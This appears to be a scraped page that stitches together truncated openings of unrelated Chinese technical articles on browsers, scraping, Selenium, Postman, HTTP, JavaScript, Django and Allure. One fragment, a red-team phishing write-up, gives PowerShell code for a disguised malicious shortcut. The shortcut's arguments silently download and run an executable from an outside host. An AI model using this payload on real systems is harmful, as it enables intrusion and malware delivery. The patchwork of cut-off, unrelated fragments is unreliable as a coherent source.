Chrome

本系列我将与大家一起学习批量下载任意公众号所有历史文章。 争取讲明白，源代码也会随着教程逐步放出来，但是不喜欢伸手党和不过如此党(凡事都说虽然我不会但我觉得不难的人)。 用户需要有一定的基础： 知道百度这个神奇的网站，而且知道是免费的。 遇到问题先自行尝试解决，不要张口就问。 有html基础（可去 http://www. runoob.com 学习)。 有python基础，会用pip安装第三方库(强烈建议新手去 http://www. liaoxuefeng.com 看免费版教程，里面也包含了如何在电脑上安装配置python) 会用chrome的开发者工具。 会了第1、2条，则第3、4条应该可以搞定。第5条在本文会讲到基础用法。 先请由本人扮演的政委讲两句： 先说点成果给大家点信心：本人2年前就已经用python完整实现了批量下载任意公众号历史文章的功能，1年前又用C#重写了整个功能，做出了界面漂亮的软件。为了避免让小白误以为本教程的终极目标是做一个图形化的软件我就不贴图了。本教程是用python代码实现批量下载功能，没有图形界面。重要的是让大家体会到整个过程中的思路，这样将来你想保存其他任何网站都不再是难事。 本人非计算机科班出身，在第一遍开发这套软件的过程中走了许多弯路，踩了许多坑，虽然现在依然是个小白，但至少可以为大家理出一条稍好走的路。为方便大家理解和操作

自己用浏览器不喜欢折腾，希望轻度设置就可顺手得使用。 因为用火狐一直感觉速度上不及chrome内核的浏览器，字体渲染虽然优异，但是看不太习惯，就一直在用chrome内核浏览器，当然火狐也是很不错的，千人千机，每个人的喜好都不同，只是记录下自己觉得体验不错的浏览器。 之前一直用的是百分浏览器，体验相当不错，但是是谷歌的同步功能，所以用起来不是很方便。 http://www.centbrowser.cn/features.html 后来发现，微软家的Edge支持了中文，用的是微软账号同步，就下载体验，整体比较简洁，设置项进行了精简，用起来也比较顺手，也是很流畅，内核版本的跟进非常及时。 目前还处于测试阶段：金丝雀→DEV→Beat 三个版本稳定性递增。当然最不稳定的，功能更新和优化是最频繁，但难免会存在BUG。 Beat版本还未开放下载，twitter上有泄露版，感兴趣的可以去找找看。 项目官网： https://www.microsoftedgeinsider.com/en-us/ 点击上方下载按钮 我下载的是DEV版本的，金丝雀更新太频繁。 浏览器一键安装在了C盘，介意的话可以使用百分浏览器。有更多实用的手势，和下载工具的支持。 安装中文语言包的流程： 1：启动浏览器，在地址栏中输入 edge://flags/#edge-language-selection 进入语言设置面板； 2

最近，小明为了达成小姐姐的愿望，在某宝买到心仪的宝贝，再加上又迷上了python，就通过python轻而易举地实现了（个人声明：对Java来说，这并不是背叛）。 需求分析&前期准备 需求其实很简单，正常购物。那我们平常的购物流程如下所示： 开始之前，我们需要准备一下程序运行环境。 环境 系统：Windows/Mac OS Python版本：3.7.2 为了让程序模拟我们每一步操作，给大家介绍一个利器： Selenium Selenium测试同学应该会感觉特别亲切。它是一个自动化测试工具，通过它我们可以驱动浏览器执行特定的动作，如点击、下拉等等操作，所见即所得。 Selenium的安装 运行如下命令： pip install selenium 但若想使用Selenium成功调用Chrome浏览器完成相应的操作，我们还需要一个媒介与浏览器对接。小明本次使用的是Chrome浏览器，因此就需要通过ChromeDriver来驱动。 ChromeDriver的安装 这里是谷歌浏览器 ChromeDriver 的官方下载地址： https://chromedriver.storage.googleapis.com/index.html 我们需要根据自己的Chrome浏览器版本，找到相应版本的ChromeDriver，再根据你电脑系统的平台类型进行下载、解压。 windows

本文授权转载 来源： ChaBug 公众号 • 前言 在常年攻防演练以及红蓝对抗中常被用于红方攻击的一种进行打点的方式，由于本人只是个安服仔，接触的比较少（但也不能不学），就有了这篇文章，参考各位大佬的姿势总结一下，顺便让好哥哥们复习一下基础。 钓鱼手段 Lnk（快捷方式） 可以在“⽬标”栏写⼊⾃⼰的恶意命令，如powershell上线命令等，这里举例为CMD 当我点击谷歌浏览器时，弹出了CMD 可以进行更改图标 • 快速生成lnk样本 $WshShell = New-Object \-comObject WScript.Shell $Shortcut = $WshShell.CreateShortcut( "test.lnk" ) $Shortcut.TargetPath = "%SystemRoot%\\system32\\cmd.exe" $Shortcut.IconLocation = "%SystemRoot%\\System32\\Shell32.dll,21" $Shortcut.Arguments = "cmd /c powershell.exe -nop -w hidden -c IEX (new-object net.webclient).DownloadFile('http://192.168.1.7:8000/ascotbe.exe','.\\\

https://code.google.com/p/xiaody/wiki/ChromiumCommandLineSwitches 来源： oschina 链接： https://my.oschina.net/u/4365856/blog/4882708

使用场景： 开发接口的时候需要快速调接口的时候 测试的时候需要非常方便的调用接口。通过不同的参数去测试接口的输出 这些接口调用是需要保存下来反复运行的 在运行过程中，如果有断言，检查点就更好了第三方 postman: 官网下载地址：https://www.getpostman.com/ 官方文档：https://www.getpostman.com/docd/ 社区及支持：https://www.getpostman.com/community postman 的安装 postman有以下一些版本： chrome插件版 native 本地版 插件版和native 版本的区别 Cookies:native 版本可以直接操作cookie ,而chrome 版本需要安装扩展 Built-in proxy:native 版本自带proxy 可以用来抓包 Menu bar(菜单栏） Restricted headers:有一些headers 在chrome app 上是受限的，比如Origin and User_Agent Don‘ t follow redirects option:native 版本才有这个选项 postman console:native 版本自带 断言的api 文档： https://www.getpostman.com/docs/postman/scripts

对比GET与POST。 1. 前言 最近看了一些同学的面经，发现无论什么技术岗位，还是会问到 get 和 post 的区别，而搜索出来的答案并不能让我们装得一手好逼，那就让我们从 HTTP 报文的角度来撸一波，从而搞明白他们的区别。 2. 标准答案 在开撸之前吗，让我们先看一下标准答案长什么样子 w3school: GET 对比 POST 。标准答案很美好，但是在面试的时候把下面的表格甩面试官一脸，估计会装逼不成反被*。 分类 GET POST 后退按钮/刷新 无害 数据会被重新提交（浏览器应该告知用户数据会被重新提交）。 书签 可收藏为书签 不可收藏为书签 缓存 能被缓存 不能缓存 编码类型 application/x-www-form-urlencoded application/x-www-form-urlencoded 或 multipart/form-data。为二进制数据使用多重编码。 历史 参数保留在浏览器历史中。 参数不会保存在浏览器历史中。 对数据长度的限制 是的。当发送数据时，GET 方法向 URL 添加数据；URL 的长度是受限制的（URL 的最大长度是 2048 个字符）。 无限制。 对数据类型的限制 只允许 ASCII 字符。 没有限制。也允许二进制数据。 安全性 与 POST 相比，GET 的安全性较差，因为所发送的数据是 URL 的一部分

点击上方“ 逆锋起笔 ”， 公众号回复 PDF 领取大佬们推荐的学习资料 作者 | Mahdhi Rezvi 译者 | 王强 策划 | 李俊辰 这篇文章列举了一些技巧，可帮助你写出更好的 JavaScript 代码，从而提高性能。 本文最初发布于 Medium 网站，经原作者授权由 InfoQ 中文站翻译并分享。 JavaScript 已经成为有史以来最受欢迎的编程语言之一。从 W3Tech 的数据来看，全世界将近 96％的网站都在使用它。关于 Web 有一个关键的事实是，你无法控制访问网站的用户所用设备。当用户访问你的网站时，使用的可能是高端设备也可能是低端设备，网络连接条件也有好有差。这意味着你必须尽可能优化自己的网站，以满足任何用户的需求。 附带提一下，请共享和重用你的 JS 组件，以在高质量代码（写起来需要花费时间）和合理的交付时间之间保持适当的平衡。你可以使用 Bit 等流行工具将任何项目中的组件（普通 JS、TS、React、Vue 等）共享到 Bit 的组件中心，用不了多大功夫。 1、删除未使用的代码和功能 你的应用程序包含的代码越多，就需要将更多的数据传输到客户端。浏览器也需要更多时间来分析和解释代码。 有时，你可能打包了很多根本用不到的功能。最好只在开发环境中保留这些额外的代码，而不要将其推送到生产环境中，以免给客户端的浏览器增加负担。 要不断问自己

Django之cookie、session和自定义分页 [TOC] 一 cookie 1.1 cookie的由来 大家都知道HTTP协议是无状态的。 无状态的意思是每次请求都是独立的，它的执行情况和结果与前面的请求和之后的请求都无直接关系，它不会受前面的请求响应情况直接影响，也不会直接影响后面的请求响应情况。 一句有意思的话来描述就是人生只如初见，对服务器来说，每次的请求都是全新的。 状态可以理解为客户端和服务器在某次会话中产生的数据，那无状态的就以为这些数据不会被保留。会话中产生的数据又是我们需要保存的，也就是说要“保持状态”。因此Cookie就是在这样一个场景下诞生。 1.2 什么是cookie Cookie具体指的是一段小信息，它是服务器发送出来存储在浏览器上的一组组键值对，下次访问服务器时浏览器会自动携带这些键值对，以便服务器提取有用信息。 1.3 cookie的原理 cookie的工作原理是：由服务器产生内容，浏览器收到请求后保存在本地；当浏览器再次访问时，浏览器会自动带上Cookie，这样服务器就能通过Cookie的内容来判断这个是“谁”了。 1.4 查看cookie 我们使用Chrome浏览器，打开开发者工具。 二 Django中操作cookie 2.1 获取cookie request.COOKIES['key'] request.get_signed_cookie

简介 宏哥之前在做接口自动化的时候，用的测试报告是HTMLTestRunner，虽说自定义模板后能满足基本诉求，但是仍显得不够档次，高端，大气，遂想用其他优秀的report框架替换之。一次偶然的机会，在一个QQ群里看到Allure的测试报告，真的是一见钟情，特别的喜欢。但是由于时间的原因就没有自己实践一下，乘着国庆假期，自己特抽时间做了一番探索。 Allure介绍 Allure是一种灵活的轻量级多语言测试报告工具，它不仅可以以简洁的Web报告形式非常简洁地显示已测试的内容，而且还允许参与开发过程的每个人从日常执行中提取最大程度的有用信息。 从开发/质量保证的角度来看，Allure报告可以缩短常见缺陷的生命周期：可以将测试失败划分为bug和残破的测试，还可以配置日志，步骤，固定装置，附件，时间，历史记录以及与TMS的集成以及Bug跟踪系统，因此负责任的开发人员和测试人员将掌握所有信息。 从管理者的角度来看，Allure提供了一个清晰的“全局”，涵盖了所涵盖的功能，缺陷聚集的位置，执行时间表的外观以及许多其他方便的事情。 魅力的模块化和可扩展性确保您始终可以微调某些东西，以使魅力更适合您。 一睹Allure风采 在展开Allure详述前，先上一份测试报告，报告主要包含总览、类别、测试套件、图表、时间刻度、功能、包等7大部分，支持自定义诸多信息，包括附件添加、缺陷链接、案例链接、测试步骤